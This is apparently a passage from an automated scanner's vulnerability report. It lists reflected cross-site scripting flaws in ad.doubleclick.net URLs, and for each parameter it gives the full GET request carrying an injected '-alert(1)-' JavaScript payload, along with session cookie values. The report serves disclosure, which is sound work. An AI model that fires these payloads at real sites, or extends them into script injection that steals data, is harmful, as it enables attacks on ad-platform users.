User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a80e"-alert(1)-"f1d880c1fb0 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=7048581277a80e"-alert(1)-"f1d880c1fb0&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2378f"-alert(1)-"aca77ed0aea was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb2378f"-alert(1)-"aca77ed0aea&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af92a"-alert(1)-"cc3235c4e7d was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9ACaf92a"-alert(1)-"cc3235c4e7d&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 225ef"-alert(1)-"0238af59b08 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353225ef"-alert(1)-"0238af59b08&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7913a"-alert(1)-"5a80d9941ef was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G7913a"-alert(1)-"5a80d9941ef&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1989"-alert(1)-"427b3fe4f34 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=d1989"-alert(1)-"427b3fe4f34 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5286c"-alert(1)-"52e38c0e3f5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!5286c"-alert(1)-"52e38c0e3f5&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91be2"-alert(1)-"08c3a9c4724 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=817380091be2"-alert(1)-"08c3a9c4724&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c70"-alert(1)-"093128206cf was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=192992137780c70"-alert(1)-"093128206cf&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62386"-alert(1)-"8c43c31d0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f492162386"-alert(1)-"8c43c31d0&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92029"-alert(1)-"8fa74e1bff2 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB92029"-alert(1)-"8fa74e1bff2&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2466"-alert(1)-"9855290f93a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838c2466"-alert(1)-"9855290f93a&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a37e5"-alert(1)-"e3e4812a691 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=Ga37e5"-alert(1)-"e3e4812a691&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3154a"-alert(1)-"6f2ae5e4955 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=3154a"-alert(1)-"6f2ae5e4955 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b3a6"-alert(1)-"763dbf5867a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!5b3a6"-alert(1)-"763dbf5867a&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc29d"-alert(1)-"63a898666d6 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801fc29d"-alert(1)-"63a898666d6&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 970af"-alert(1)-"c3c5aa073d6 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037970af"-alert(1)-"c3c5aa073d6&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc82d"-alert(1)-"c81877f4178 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83fc82d"-alert(1)-"c81877f4178&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae172"-alert(1)-"f6eedac639f was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXTae172"-alert(1)-"f6eedac639f&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5188d"-alert(1)-"a33579bde31 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=83082445188d"-alert(1)-"a33579bde31&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56f01"-alert(1)-"f34eea5e6e6 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G56f01"-alert(1)-"f34eea5e6e6&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4009"-alert(1)-"ec217f7248b was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=a4009"-alert(1)-"ec217f7248b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e018"-alert(1)-"0e1e7727ec4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!4e018"-alert(1)-"0e1e7727ec4&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
